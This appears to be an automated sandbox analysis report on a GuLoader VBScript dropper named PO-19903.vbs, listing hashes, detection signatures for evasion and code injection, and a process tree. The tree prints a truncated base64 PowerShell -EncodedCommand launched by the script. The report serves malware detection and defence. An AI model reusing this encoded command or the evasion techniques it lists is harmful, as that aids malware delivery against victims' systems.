Edit tour
Windows
Analysis Report
PO-19903.vbs
Overview
General Information
| Sample Name: | PO-19903.vbs |
| Analysis ID: | 625175 |
| MD5: | 0347b27843d88f73fdcd4dadb95549ac |
| SHA1: | 2a2d6bcd2d83833d501b9695921855e1992f6ec8 |
| SHA256: | 1ab3aacaa62faa6a83173e9191972d427aab92f33c527f6964f141e21c930e67 |
| Infos: |  |
 | |
Detection
GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64native
wscript.exe (PID: 5568 cmdline: C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\PO-19 903.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) 
powershell.exe (PID: 9096 cmdline: C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBE AGkAcwBkAG EAaQAgAEQA aQBzAGgAdQ BtAGEANQAg AFMAbwByAH QAIABUAEEA RgBGAEUAIA BDAHIAYQBt AHAAbwBvAG 4AZAAgAEcA UgBVAE4AVA BJAE4ARwBC ACAAUAByAG UAYQBtAGIA dQBsAGEAdA AzACAAQQBz AHMAaQBtAG kAbAA2ACAA RgB1AHIAcw BlAG0AaQBk AGUAYgAgAE YAdQByAGkA ZQBuAHMAZA BlAGMAIABB AGwAYQByAG 0AdQByAGUA MgAgAEMAaA BvAHIAaQBi ACAASABVAE 0ATwAgAEYA SQBTAFQARQ BMAFMAVABF AE0AIABTAH QAZQBnAGUA IABjAGgAZQ BzAHMAZQAg AGIAYQByAH IAeQBtAG8A cgAgAEEAbg BuAGcAcgBl AHQAaABlAD MAIAANAAoA IwBSAGUAbQ BpAG4AZwBs AGkANAAgAG UAcgBuAHIA IABCAGUAcw BwAHkAdAAg AFMAdQBsAH AAaABvAHoA aQBuADgAIA BWAEkAUgBH AFUATABBAC AASQBGAFIA RAAgAEYAbw ByAGUAIABQ AGwAdQByAG EAbAB2AGUA awBzADEAIA BQAHIAbwBm AGkAbABlAG 4AdQAgAG4A bwBuAGYAbw AgAEkAbgBq AHUAcwB0AD kAIABOAG8A dQByAGkAcw BoAG0AZQBu ADMAIAB0AG 8AbQBhAGgA YQB2AGsAZQ BuACAARQBz AHMAYQB5AD EAIABCAEwA QQBBACAAdA ByAGEAbgBz AG0AbwBnAC AAaAB1AGwA awAgAGkAbg BsAGEAeQBl ACAADQAKAC MAawB2AGEA cgAgAEsAbw BiAGEAbgBn AGYAbwByAD YAIABIAHkA cABlAHIAYQ ByAGMANgAg AEcAQQBSAE QARQBSAE8A QgBFAE4AIA BPAG4AYwBv AHMAcABoAG UAcgBlACAA QgB1AG4AZw BsAGkAbgAg AEIAQQBSAF kAVAAgAFQA TwBNAEEAUw BUAEUAIABD AE8AUgBSAE 8AQgBPAFIA QQBUACAAQw BZAEsARQBM AFAAQQBSAC AAUwB0AGEA ZABzAGwAZw AzACAAQgBh AGMAaQBsAG wAZQBiACAA QgBMAFUAUg BUAEkATgAg AGEAZABtAG kAbgBpAHMA dAByACAATQ BpAGwAaQBl AHUAYgAzAC AAQgBsAGEA ZABlAGwAZQ A4ACAAYQBw AG8AbQBlAH QAYQBiACAA DQAKACMAUA BlAGEAbAA4 ACAASwBpAG 4AZwA5ACAA TwBwAG0Acg BrAGUAcgBj AG8AIABJAE QARQBMAEkA RwBFAFMASQ AgAFMAeQBz AHQAZQBtAG EAdAA3ACAA UAByAGUAbw BwAGUAcgAz ACAAUgBlAH MAbwAgAFMA UABBAEcATg BVAE0AIABM AGEAbgBkAC AAcgBlAGMA awBvAG4AaQ AgAGQAZQBw AHIAYQB2AG UAcgAgAGYA YQByAHQAag BzAGYAbwBy AHQAIABMAE EATgBOACAA RwByAGkAZg BmAG8AbgBh AGcAMwAgAE EARgBTAEUA IABoAGoAcw BkACAAYQBu AGEAbAB5AH MAZQBhAHIA YgAgAEEATQ BVAEwAQQBT ACAADQAKAC MAdQBuAGoA bwBsAGwAeQ AgAEkAbgBz AHQAcgB1AG 0AZQBuACAA RwBMAEEATA BJAEkATgBH AEwAIABSAG UAcwBvAGEA cAAgAFcAbw BtAGEAbgBp ACAATABlAG cAZwBpAGUA cgA1ACAAVQ BOAEIAUgBF AEEASwBJAE 4ARwAgAE8A cgBpAGwAbA BpAG8AIABh AGQAcgBlAG EAIABBAEwA VABPAEwAQQ BUACAARgBh AGcAbwAyAC AASQBuAGYA bABhAG0AbQ BhAHQANgAg AEMATwBDAE sATgBFAFkA RABPAE0AIA BTAFkATQBQ AE8AUwBJAC AAZwByAGEA dgBlAHIAZQ B1ACAARgBP AFIAVQBEAC AARgBBAFMA VABSAEUAUw BGAEkAIABL AG8AbgB0AH IAbwBsACAA UwBLAFIATA BFAFYAIABB AE4AQQBMAF kAVABJAEsA RQBSACAAVQ BOAEMAUgAg AFMAbwByAH QAcwByACAA dgBpAGQAbg BlAGYAcgBz ACAARQBPAE MAQQBSAEIA TwAgAFQAYQ BrAHQAIABC AGUAdAB2AG kAdgBsAGUA cgAzACAAVg BlAGwAYQBy ACAADQAKAC MAUgBlAHYA YQBuAGMAaA BlAHIAIABX AG8AcgBkAG EAYgBsAGUA cwAgAGwAbw B1AHMAaQBl AHIAbQBhAC AAaQBuAGQA bABvAGcAcg BiAHIAbgAg AEEAdAB0AG EAIABSAEUA QgBMAE8AVw BOAEcAVQAg AFEAVQBFAE IAUgBJAFQA